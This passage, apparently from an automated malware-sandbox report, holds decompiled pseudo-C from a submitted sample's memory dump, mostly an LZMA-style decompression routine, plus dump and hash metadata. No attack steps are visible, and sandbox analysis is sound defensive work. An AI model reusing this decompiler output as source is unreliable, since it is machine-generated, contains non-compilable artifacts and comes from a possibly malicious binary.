                  									__eax = __eax +  *(__ebp - 0x74);
                  									__eflags = __eax;
                  								}
                  								__edx =  *(__ebp - 8);
                  								__cl =  *(__eax + __edx);
                  								__eax =  *(__ebp - 0x14);
                  								 *(__ebp - 0x5c) = __cl;
                  								 *(__eax + __edx) = __cl;
                  								__eax = __eax + 1;
                  								__edx = 0;
                  								_t414 = __eax %  *(__ebp - 0x74);
                  								__eax = __eax /  *(__ebp - 0x74);
                  								__edx = _t414;
                  								__eax =  *(__ebp - 0x68);
                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                  								__eflags =  *(__ebp - 0x30);
                  								 *( *(__ebp - 0x68)) = __cl;
                  								 *(__ebp - 0x14) = _t414;
                  								if( *(__ebp - 0x30) > 0) {
                  									continue;
                  								} else {
                  									goto L80;
                  								}
                  							}
                  							 *(__ebp - 0x88) = 0x1c;
                  							goto L170;
                  					}
                  				}
                  			}














                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                  • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                  • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                  • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00405E9D(void* __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				signed int _v16;
                  				unsigned int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				signed int _v32;
                  				signed int _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				signed int _v48;
                  				signed int _v52;
                  				signed int _v56;
                  				signed int _v60;
                  				signed int _v64;
                  				signed int _v68;
                  				signed int _v72;
                  				signed int _v76;
                  				signed int _v80;
                  				signed int _v84;
                  				signed int _v88;
                  				signed int _v92;
                  				signed int _v95;
                  				signed int _v96;
                  				signed int _v100;
                  				signed int _v104;
                  				signed int _v108;
                  				signed int _v112;
                  				signed int _v116;
                  				signed int _v120;
                  				intOrPtr _v124;
                  				signed int _v128;
                  				signed int _v132;
                  				signed int _v136;
                  				void _v140;
                  				void* _v148;
                  				signed int _t537;
                  				signed int _t538;
                  				signed int _t572;
                  
                  				_t572 = 0x22;
                  				_v148 = __ecx;
                  				memcpy( &_v140, __ecx, _t572 << 2);
                  				if(_v52 == 0xffffffff) {
                  					return 1;
                  				}
                  				while(1) {
                  					L3:
                  					_t537 = _v140;
                  					if(_t537 > 0x1c) {
                  						break;
                  					}
                  					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                  						case 0:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								goto L173;
                  							}
                  							_v112 = _v112 - 1;
                  							_v116 = _v116 + 1;
                  							_t537 =  *_v116;
                  							__eflags = _t537 - 0xe1;
                  							if(_t537 > 0xe1) {
                  								goto L174;
                  							}
                  							_t542 = _t537 & 0x000000ff;
                  							_push(0x2d);
                  							asm("cdq");
                  							_pop(_t576);
                  							_push(9);
                  							_pop(_t577);
                  							_t622 = _t542 / _t576;
                  							_t544 = _t542 % _t576 & 0x000000ff;
                  							asm("cdq");
                  							_t617 = _t544 % _t577 & 0x000000ff;
                  							_v64 = _t617;
                  							_v32 = (1 << _t622) - 1;
                  							_v28 = (1 << _t544 / _t577) - 1;
                  							_t625 = (0x300 << _t617 + _t622) + 0x736;
                  							__eflags = 0x600 - _v124;
                  							if(0x600 == _v124) {
                  								L12:
                  								__eflags = _t625;
                  								if(_t625 == 0) {
                  									L14:
                  									_v76 = _v76 & 0x00000000;
                  									_v68 = _v68 & 0x00000000;
                  									goto L17;
                  								} else {
                  									goto L13;
                  								}
                  								do {
                  									L13:
                  									_t625 = _t625 - 1;
                  									__eflags = _t625;
                  									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                  								} while (_t625 != 0);
                  								goto L14;
                  							}
                  							__eflags = _v8;
                  							if(_v8 != 0) {
                  								GlobalFree(_v8);
                  							}
                  							_t537 = GlobalAlloc(0x40, 0x600); // executed
                  							__eflags = _t537;
                  							_v8 = _t537;
                  							if(_t537 == 0) {
                  								goto L174;
                  							} else {
                  								_v124 = 0x600;
                  								goto L12;
                  							}
                  						case 1:
                  							L15:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 1;
                  								goto L173;
                  							}
                  							_v112 = _v112 - 1;
                  							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                  							_v116 = _v116 + 1;
                  							_t50 =  &_v76;
                  							 *_t50 = _v76 + 1;
                  							__eflags =  *_t50;
                  							L17:
                  							__eflags = _v76 - 4;
                  							if(_v76 < 4) {
                  								goto L15;
                  							}
                  							_t550 = _v68;
                  							__eflags = _t550 - _v120;
                  							if(_t550 == _v120) {
                  								L22:
                  								_v76 = 5;
                  								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                  								goto L25;
                  							}
                  							__eflags = _v12;
                  							_v120 = _t550;
                  							if(_v12 != 0) {
                  								GlobalFree(_v12);
                  							}
                  							_t537 = GlobalAlloc(0x40, _v68); // executed
                  							__eflags = _t537;
                  							_v12 = _t537;
                  							if(_t537 == 0) {
                  								goto L174;
                  							} else {
                  								goto L22;
                  							}
                  						case 2:
                  							L26:
                  							_t557 = _v100 & _v32;
                  							_v136 = 6;
                  							_v80 = _t557;
                  							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                  							goto L135;
                  						case 3:
                  							L23:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 3;
                  								goto L173;
                  							}
                  							_v112 = _v112 - 1;
                  							_t72 =  &_v116;
                  							 *_t72 = _v116 + 1;
                  							__eflags =  *_t72;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							L25:
                  							_v76 = _v76 - 1;
                  							__eflags = _v76;
                  							if(_v76 != 0) {
                  								goto L23;
                  							}
                  							goto L26;
                  						case 4:
                  							L136:
                  							_t559 =  *_t626;
                  							_t610 = _t559 & 0x0000ffff;
                  							_t591 = (_v20 >> 0xb) * _t610;
                  							__eflags = _v16 - _t591;
                  							if(_v16 >= _t591) {
                  								_v20 = _v20 - _t591;
                  								_v16 = _v16 - _t591;
                  								_v68 = 1;
                  								_t560 = _t559 - (_t559 >> 5);
                  								__eflags = _t560;
                  								 *_t626 = _t560;
                  							} else {
                  								_v20 = _t591;
                  								_v68 = _v68 & 0x00000000;
                  								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                  							}
                  							__eflags = _v20 - 0x1000000;
                  							if(_v20 >= 0x1000000) {
                  								goto L142;
                  							} else {
                  								goto L140;
                  							}
                  						case 5:
                  							L140:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 5;
                  								goto L173;
                  							}
                  							_v20 = _v20 << 8;
                  							_v112 = _v112 - 1;
                  							_t464 =  &_v116;
                  							 *_t464 = _v116 + 1;
                  							__eflags =  *_t464;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							L142:
                  							_t561 = _v136;
                  							goto L143;
                  						case 6:
                  							__edx = 0;
                  							__eflags = _v68;
                  							if(_v68 != 0) {
                  								__eax = _v8;
                  								__ecx = _v60;
                  								_v56 = 1;
                  								_v136 = 7;
                  								__esi = _v8 + 0x180 + _v60 * 2;
                  								goto L135;
                  							}
                  							__eax = _v96 & 0x000000ff;
                  							__esi = _v100;
                  							__cl = 8;
                  							__cl = 8 - _v64;
                  							__esi = _v100 & _v28;
                  							__eax = (_v96 & 0x000000ff) >> 8;
                  							__ecx = _v64;
                  							__esi = (_v100 & _v28) << 8;
                  							__ecx = _v8;
                  							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                  							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                  							__eflags = _v60 - 4;
                  							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                  							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                  							if(_v60 >= 4) {
                  								__eflags = _v60 - 0xa;
                  								if(_v60 >= 0xa) {
                  									_t103 =  &_v60;
                  									 *_t103 = _v60 - 6;
                  									__eflags =  *_t103;
                  								} else {
                  									_v60 = _v60 - 3;
                  								}
                  							} else {
                  								_v60 = 0;
                  							}
                  							__eflags = _v56 - __edx;
                  							if(_v56 == __edx) {
                  								__ebx = 0;
                  								__ebx = 1;
                  								goto L63;
                  							}
                  							__eax = _v24;
                  							__eax = _v24 - _v48;
                  							__eflags = __eax - _v120;
                  							if(__eax >= _v120) {
                  								__eax = __eax + _v120;
                  								__eflags = __eax;
                  							}
                  							__ecx = _v12;
                  							__ebx = 0;
                  							__ebx = 1;
                  							__al =  *((intOrPtr*)(__eax + __ecx));
                  							_v95 =  *((intOrPtr*)(__eax + __ecx));
                  							goto L43;
                  						case 7:
                  							__eflags = _v68 - 1;
                  							if(_v68 != 1) {
                  								__eax = _v40;
                  								_v132 = 0x16;
                  								_v36 = _v40;
                  								__eax = _v44;
                  								_v40 = _v44;
                  								__eax = _v48;
                  								_v44 = _v48;
                  								__eax = 0;
                  								__eflags = _v60 - 7;
                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  								__al = __al & 0x000000fd;
                  								__eax = (__eflags >= 0) - 1 + 0xa;
                  								_v60 = (__eflags >= 0) - 1 + 0xa;
                  								__eax = _v8;
                  								__eax = _v8 + 0x664;
                  								__eflags = __eax;
                  								_v92 = __eax;
                  								goto L71;
                  							}
                  							__eax = _v8;
                  							__ecx = _v60;
                  							_v136 = 8;
                  							__esi = _v8 + 0x198 + _v60 * 2;
                  							goto L135;
                  						case 8:
                  							__eflags = _v68;
                  							if(_v68 != 0) {
                  								__eax = _v8;
                  								__ecx = _v60;
                  								_v136 = 0xa;
                  								__esi = _v8 + 0x1b0 + _v60 * 2;
                  							} else {
                  								__eax = _v60;
                  								__ecx = _v8;
                  								__eax = _v60 + 0xf;
                  								_v136 = 9;
                  								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                  								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                  							}
                  							goto L135;
                  						case 9:
                  							__eflags = _v68;
                  							if(_v68 != 0) {
                  								goto L92;
                  							}
                  							__eflags = _v100;
                  							if(_v100 == 0) {
                  								goto L174;
                  							}
                  							__eax = 0;
                  							__eflags = _v60 - 7;
                  							_t264 = _v60 - 7 >= 0;
                  							__eflags = _t264;
                  							0 | _t264 = _t264 + _t264 + 9;
                  							_v60 = _t264 + _t264 + 9;
                  							goto L78;
                  						case 0xa:
                  							__eflags = _v68;
                  							if(_v68 != 0) {
                  								__eax = _v8;
                  								__ecx = _v60;
                  								_v136 = 0xb;
                  								__esi = _v8 + 0x1c8 + _v60 * 2;
                  								goto L135;
                  							}
                  							__eax = _v44;
                  							goto L91;
                  						case 0xb:
                  							__eflags = _v68;
                  							if(_v68 != 0) {
                  								__ecx = _v40;
                  								__eax = _v36;
                  								_v36 = _v40;
                  							} else {
                  								__eax = _v40;
                  							}
                  							__ecx = _v44;
                  							_v40 = _v44;
                  							L91:
                  							__ecx = _v48;
                  							_v48 = __eax;
                  							_v44 = _v48;
                  							L92:
                  							__eax = _v8;
                  							_v132 = 0x15;
                  							__eax = _v8 + 0xa68;
                  							_v92 = _v8 + 0xa68;
                  							goto L71;
                  						case 0xc:
                  							L102:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 0xc;
                  								goto L173;
                  							}
                  							__ecx = _v116;
                  							__eax = _v16;
                  							_v20 = _v20 << 8;
                  							__ecx =  *_v116 & 0x000000ff;
                  							_v112 = _v112 - 1;
                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							_t340 =  &_v116;
                  							 *_t340 = _v116 + 1;
                  							__eflags =  *_t340;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							__eax = _v48;
                  							goto L104;
                  						case 0xd:
                  							L39:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 0xd;
                  								goto L173;
                  							}
                  							__ecx = _v116;
                  							__eax = _v16;
                  							_v20 = _v20 << 8;
                  							__ecx =  *_v116 & 0x000000ff;
                  							_v112 = _v112 - 1;
                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							_t127 =  &_v116;
                  							 *_t127 = _v116 + 1;
                  							__eflags =  *_t127;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							L41:
                  							__eax = _v68;
                  							__eflags = _v76 - _v68;
                  							if(_v76 != _v68) {
                  								goto L50;
                  							}
                  							__eflags = __ebx - 0x100;
                  							if(__ebx >= 0x100) {
                  								goto L56;
                  							}
                  							L43:
                  							__eax = _v95 & 0x000000ff;
                  							_v95 = _v95 << 1;
                  							__ecx = _v92;
                  							__eax = (_v95 & 0x000000ff) >> 7;
                  							_v76 = __eax;
                  							__eax = __eax + 1;
                  							__eax = __eax << 8;
                  							__eax = __eax + __ebx;
                  							__esi = _v92 + __eax * 2;
                  							_v20 = _v20 >> 0xb;
                  							__ax =  *__esi;
                  							_v88 = __esi;
                  							__edx = __ax & 0x0000ffff;
                  							__ecx = (_v20 >> 0xb) * __edx;
                  							__eflags = _v16 - __ecx;
                  							if(_v16 >= __ecx) {
                  								_v20 = _v20 - __ecx;
                  								_v16 = _v16 - __ecx;
                  								__cx = __ax;
                  								_v68 = 1;
                  								__cx = __ax >> 5;
                  								__eflags = __eax;
                  								__ebx = __ebx + __ebx + 1;
                  								 *__esi = __ax;
                  							} else {
                  								_v68 = _v68 & 0x00000000;
                  								_v20 = __ecx;
                  								0x800 = 0x800 - __edx;
                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  								__ebx = __ebx + __ebx;
                  								 *__esi = __cx;
                  							}
                  							__eflags = _v20 - 0x1000000;
                  							_v72 = __ebx;
                  							if(_v20 >= 0x1000000) {
                  								goto L41;
                  							} else {
                  								goto L39;
                  							}
                  						case 0xe:
                  							L48:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 0xe;
                  								goto L173;
                  							}
                  							__ecx = _v116;
                  							__eax = _v16;
                  							_v20 = _v20 << 8;
                  							__ecx =  *_v116 & 0x000000ff;
                  							_v112 = _v112 - 1;
                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							_t161 =  &_v116;
                  							 *_t161 = _v116 + 1;
                  							__eflags =  *_t161;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							while(1) {
                  								L50:
                  								__eflags = __ebx - 0x100;
                  								if(__ebx >= 0x100) {
                  									break;
                  								}
                  								__eax = _v92;
                  								__edx = __ebx + __ebx;
                  								__ecx = _v20;
                  								__esi = __edx + __eax;
                  								__ecx = _v20 >> 0xb;
                  								__ax =  *__esi;
                  								_v88 = __esi;
                  								__edi = __ax & 0x0000ffff;
                  								__ecx = (_v20 >> 0xb) * __edi;
                  								__eflags = _v16 - __ecx;
                  								if(_v16 >= __ecx) {
                  									_v20 = _v20 - __ecx;
                  									_v16 = _v16 - __ecx;
                  									__cx = __ax;
                  									_t175 = __edx + 1; // 0x1
                  									__ebx = _t175;
                  									__cx = __ax >> 5;
                  									__eflags = __eax;
                  									 *__esi = __ax;
                  								} else {
                  									_v20 = __ecx;
                  									0x800 = 0x800 - __edi;
                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  									__ebx = __ebx + __ebx;
                  									 *__esi = __cx;
                  								}
                  								__eflags = _v20 - 0x1000000;
                  								_v72 = __ebx;
                  								if(_v20 >= 0x1000000) {
                  									continue;
                  								} else {
                  									goto L48;
                  								}
                  							}
                  							L56:
                  							_t178 =  &_v56;
                  							 *_t178 = _v56 & 0x00000000;
                  							__eflags =  *_t178;
                  							goto L57;
                  						case 0xf:
                  							L60:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 0xf;
                  								goto L173;
                  							}
                  							__ecx = _v116;
                  							__eax = _v16;
                  							_v20 = _v20 << 8;
                  							__ecx =  *_v116 & 0x000000ff;
                  							_v112 = _v112 - 1;
                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							_t208 =  &_v116;
                  							 *_t208 = _v116 + 1;
                  							__eflags =  *_t208;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							L62:
                  							__eflags = __ebx - 0x100;
                  							if(__ebx >= 0x100) {
                  								L57:
                  								__al = _v72;
                  								_v96 = _v72;
                  								goto L58;
                  							}
                  							L63:
                  							__eax = _v92;
                  							__edx = __ebx + __ebx;
                  							__ecx = _v20;
                  							__esi = __edx + __eax;
                  							__ecx = _v20 >> 0xb;
                  							__ax =  *__esi;
                  							_v88 = __esi;
                  							__edi = __ax & 0x0000ffff;
                  							__ecx = (_v20 >> 0xb) * __edi;
                  							__eflags = _v16 - __ecx;
                  							if(_v16 >= __ecx) {
                  								_v20 = _v20 - __ecx;
                  								_v16 = _v16 - __ecx;
                  								__cx = __ax;
                  								_t222 = __edx + 1; // 0x1
                  								__ebx = _t222;
                  								__cx = __ax >> 5;
                  								__eflags = __eax;
                  								 *__esi = __ax;
                  							} else {
                  								_v20 = __ecx;
                  								0x800 = 0x800 - __edi;
                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  								__ebx = __ebx + __ebx;
                  								 *__esi = __cx;
                  							}
                  							__eflags = _v20 - 0x1000000;
                  							_v72 = __ebx;
                  							if(_v20 >= 0x1000000) {
                  								goto L62;
                  							} else {
                  								goto L60;
                  							}
                  						case 0x10:
                  							L112:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 0x10;
                  								goto L173;
                  							}
                  							__ecx = _v116;
                  							__eax = _v16;
                  							_v20 = _v20 << 8;
                  							__ecx =  *_v116 & 0x000000ff;
                  							_v112 = _v112 - 1;
                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							_t371 =  &_v116;
                  							 *_t371 = _v116 + 1;
                  							__eflags =  *_t371;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							goto L114;
                  						case 0x11:
                  							L71:
                  							__esi = _v92;
                  							_v136 = 0x12;
                  							goto L135;
                  						case 0x12:
                  							__eflags = _v68;
                  							if(_v68 != 0) {
                  								__eax = _v92;
                  								_v136 = 0x13;
                  								__esi = _v92 + 2;
                  								L135:
                  								_v88 = _t626;
                  								goto L136;
                  							}
                  							__eax = _v80;
                  							_v52 = _v52 & 0x00000000;
                  							__ecx = _v92;
                  							__eax = _v80 << 4;
                  							__eflags = __eax;
                  							__eax = _v92 + __eax + 4;
                  							goto L133;
                  						case 0x13:
                  							__eflags = _v68;
                  							if(_v68 != 0) {
                  								_t475 =  &_v92;
                  								 *_t475 = _v92 + 0x204;
                  								__eflags =  *_t475;
                  								_v52 = 0x10;
                  								_v68 = 8;
                  								L147:
                  								_v128 = 0x14;
                  								goto L148;
                  							}
                  							__eax = _v80;
                  							__ecx = _v92;
                  							__eax = _v80 << 4;
                  							_v52 = 8;
                  							__eax = _v92 + (_v80 << 4) + 0x104;
                  							L133:
                  							_v92 = __eax;
                  							_v68 = 3;
                  							goto L147;
                  						case 0x14:
                  							_v52 = _v52 + __ebx;
                  							__eax = _v132;
                  							goto L143;
                  						case 0x15:
                  							__eax = 0;
                  							__eflags = _v60 - 7;
                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  							__al = __al & 0x000000fd;
                  							__eax = (__eflags >= 0) - 1 + 0xb;
                  							_v60 = (__eflags >= 0) - 1 + 0xb;
                  							goto L123;
                  						case 0x16:
                  							__eax = _v52;
                  							__eflags = __eax - 4;
                  							if(__eax >= 4) {
                  								_push(3);
                  								_pop(__eax);
                  							}
                  							__ecx = _v8;
                  							_v68 = 6;
                  							__eax = __eax << 7;
                  							_v128 = 0x19;
                  							_v92 = __eax;
                  							goto L148;
                  						case 0x17:
                  							L148:
                  							__eax = _v68;
                  							_v84 = 1;
                  							_v76 = _v68;
                  							goto L152;
                  						case 0x18:
                  							L149:
                  							__eflags = _v112;
                  							if(_v112 == 0) {
                  								_v140 = 0x18;
                  								goto L173;
                  							}
                  							__ecx = _v116;
                  							__eax = _v16;
                  							_v20 = _v20 << 8;
                  							__ecx =  *_v116 & 0x000000ff;
                  							_v112 = _v112 - 1;
                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							_t490 =  &_v116;
                  							 *_t490 = _v116 + 1;
                  							__eflags =  *_t490;
                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                  							L151:
                  							_t493 =  &_v76;
                  							 *_t493 = _v76 - 1;
                  							__eflags =  *_t493;
                  							L152:
                  							__eflags = _v76;
                  							if(_v76 <= 0) {
                  								__ecx = _v68;
                  								__ebx = _v84;
                  								0 = 1;
                  								__eax = 1 << __cl;
                  								__ebx = _v84 - (1 << __cl);
                  								__eax = _v128;
                  								_v72 = __ebx;
                  								L143:
                  								_v140 = _t561;
                  								goto L3;
                  							}
                  							__eax = _v84;
                  							_v20 = _v20 >> 0xb;
                  							__edx = _v84 + _v84;
                  							__eax = _v92;
                  							__esi = __edx + __eax;
                  							_v88 = __esi;
                  							__ax =  *__esi;
                  							__edi = __ax & 0x0000ffff;
                  							__ecx = (_v20 >> 0xb) * __edi;
                  							__eflags = _v16 - __ecx;
                  							if(_v16 >= __ecx) {
                  								_v20 = _v20 - __ecx;
                  								_v16 = _v16 - __ecx;
                  								__cx = __ax;
                  								__cx = __ax >> 5;
                  								__eax = __eax - __ecx;
                  								__edx = __edx + 1;
                  								__eflags = __edx;
                  								 *__esi = __ax;
                  								_v84 = __edx;
                  							} else {
                  								_v20 = __ecx;
                  								0x800 = 0x800 - __edi;
                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  								_v84 = _v84 << 1;
                  								 *__esi = __cx;
                  							}
                  							__eflags = _v20 - 0x1000000;
                  							if(_v20 >= 0x1000000) {
                  								goto L151;
                  							} else {
                  								goto L149;
                  							}
                  						case 0x19:
                  							__eflags = __ebx - 4;
                  							if(__ebx < 4) {
                  								_v48 = __ebx;
                  								L122:
                  								_t399 =  &_v48;
                  								 *_t399 = _v48 + 1;
                  								__eflags =  *_t399;
                  								L123:
                  								__eax = _v48;
                  								__eflags = __eax;
                  								if(__eax == 0) {
                  									_v52 = _v52 | 0xffffffff;
                  									goto L173;
                  								}
                  								__eflags = __eax - _v100;
                  								if(__eax > _v100) {
                  									goto L174;
                  								}
                  								_v52 = _v52 + 2;
                  								__eax = _v52;
                  								_t406 =  &_v100;
                  								 *_t406 = _v100 + _v52;
                  								__eflags =  *_t406;
                  								goto L126;
                  							}
                  							__ecx = __ebx;
                  							__eax = __ebx;
                  							__ecx = __ebx >> 1;
                  							__eax = __ebx & 0x00000001;
                  							__ecx = (__ebx >> 1) - 1;
                  							__al = __al | 0x00000002;
                  							__eax = (__ebx & 0x00000001) << __cl;
                  							__eflags = __ebx - 0xe;
                  							_v48 = __eax;
                  							if(__ebx >= 0xe) {
                  								__ebx = 0;
                  								_v76 = __ecx;
                  								L105:
                  								__eflags = _v76;
                  								if(_v76 <= 0) {
                  									__eax = __eax + __ebx;
                  									_v68 = 4;
                  									_v48 = __eax;
                  									__eax = _v8;
                  									__eax = _v8 + 0x644;
                  									__eflags = __eax;
                  									L111:
                  									__ebx = 0;
                  									_v92 = __eax;
                  									_v84 = 1;
                  									_v72 = 0;
                  									_v76 = 0;
                  									L115:
                  									__eax = _v68;
                  									__eflags = _v76 - _v68;
                  									if(_v76 >= _v68) {
                  										_t397 =  &_v48;
                  										 *_t397 = _v48 + __ebx;
                  										__eflags =  *_t397;
                  										goto L122;
                  									}
                  									__eax = _v84;
                  									_v20 = _v20 >> 0xb;
                  									__edi = _v84 + _v84;
                  									__eax = _v92;
                  									__esi = __edi + __eax;
                  									_v88 = __esi;
                  									__ax =  *__esi;
                  									__ecx = __ax & 0x0000ffff;
                  									__edx = (_v20 >> 0xb) * __ecx;
                  									__eflags = _v16 - __edx;
                  									if(_v16 >= __edx) {
                  										__ecx = 0;
                  										_v20 = _v20 - __edx;
                  										__ecx = 1;
                  										_v16 = _v16 - __edx;
                  										__ebx = 1;
                  										__ecx = _v76;
                  										__ebx = 1 << __cl;
                  										__ecx = 1 << __cl;
                  										__ebx = _v72;
                  										__ebx = _v72 | __ecx;
                  										__cx = __ax;
                  										__cx = __ax >> 5;
                  										__eax = __eax - __ecx;
                  										__edi = __edi + 1;
                  										__eflags = __edi;
                  										_v72 = __ebx;
                  										 *__esi = __ax;
                  										_v84 = __edi;
                  									} else {
                  										_v20 = __edx;
                  										0x800 = 0x800 - __ecx;
                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                  										_v84 = _v84 << 1;
                  										 *__esi = __dx;
                  									}
                  									__eflags = _v20 - 0x1000000;
                  									if(_v20 >= 0x1000000) {
                  										L114:
                  										_t374 =  &_v76;
                  										 *_t374 = _v76 + 1;
                  										__eflags =  *_t374;
                  										goto L115;
                  									} else {
                  										goto L112;
                  									}
                  								}
                  								__ecx = _v16;
                  								__ebx = __ebx + __ebx;
                  								_v20 = _v20 >> 1;
                  								__eflags = _v16 - _v20;
                  								_v72 = __ebx;
                  								if(_v16 >= _v20) {
                  									__ecx = _v20;
                  									_v16 = _v16 - _v20;
                  									__ebx = __ebx | 0x00000001;
                  									__eflags = __ebx;
                  									_v72 = __ebx;
                  								}
                  								__eflags = _v20 - 0x1000000;
                  								if(_v20 >= 0x1000000) {
                  									L104:
                  									_t344 =  &_v76;
                  									 *_t344 = _v76 - 1;
                  									__eflags =  *_t344;
                  									goto L105;
                  								} else {
                  									goto L102;
                  								}
                  							}
                  							__edx = _v8;
                  							__eax = __eax - __ebx;
                  							_v68 = __ecx;
                  							__eax = _v8 + 0x55e + __eax * 2;
                  							goto L111;
                  						case 0x1a:
                  							L58:
                  							__eflags = _v104;
                  							if(_v104 == 0) {
                  								_v140 = 0x1a;
                  								goto L173;
                  							}
                  							__ecx = _v108;
                  							__al = _v96;
                  							__edx = _v12;
                  							_v100 = _v100 + 1;
                  							_v108 = _v108 + 1;
                  							_v104 = _v104 - 1;
                  							 *_v108 = __al;
                  							__ecx = _v24;
                  							 *(_v12 + __ecx) = __al;
                  							__eax = __ecx + 1;
                  							__edx = 0;
                  							_t197 = __eax % _v120;
                  							__eax = __eax / _v120;
                  							__edx = _t197;
                  							goto L82;
                  						case 0x1b:
                  							L78:
                  							__eflags = _v104;
                  							if(_v104 == 0) {
                  								_v140 = 0x1b;
                  								goto L173;
                  							}
                  							__eax = _v24;
                  							__eax = _v24 - _v48;
                  							__eflags = __eax - _v120;
                  							if(__eax >= _v120) {
                  								__eax = __eax + _v120;
                  								__eflags = __eax;
                  							}
                  							__edx = _v12;
                  							__cl =  *(__edx + __eax);
                  							__eax = _v24;
                  							_v96 = __cl;
                  							 *(__edx + __eax) = __cl;
                  							__eax = __eax + 1;
                  							__edx = 0;
                  							_t280 = __eax % _v120;
                  							__eax = __eax / _v120;
                  							__edx = _t280;
                  							__eax = _v108;
                  							_v100 = _v100 + 1;
                  							_v108 = _v108 + 1;
                  							_t289 =  &_v104;
                  							 *_t289 = _v104 - 1;
                  							__eflags =  *_t289;
                  							 *_v108 = __cl;
                  							L82:
                  							_v24 = __edx;
                  							goto L83;
                  						case 0x1c:
                  							while(1) {
                  								L126:
                  								__eflags = _v104;
                  								if(_v104 == 0) {
                  									break;
                  								}
                  								__eax = _v24;
                  								__eax = _v24 - _v48;
                  								__eflags = __eax - _v120;
                  								if(__eax >= _v120) {
                  									__eax = __eax + _v120;
                  									__eflags = __eax;
                  								}
                  								__edx = _v12;
                  								__cl =  *(__edx + __eax);
                  								__eax = _v24;
                  								_v96 = __cl;
                  								 *(__edx + __eax) = __cl;
                  								__eax = __eax + 1;
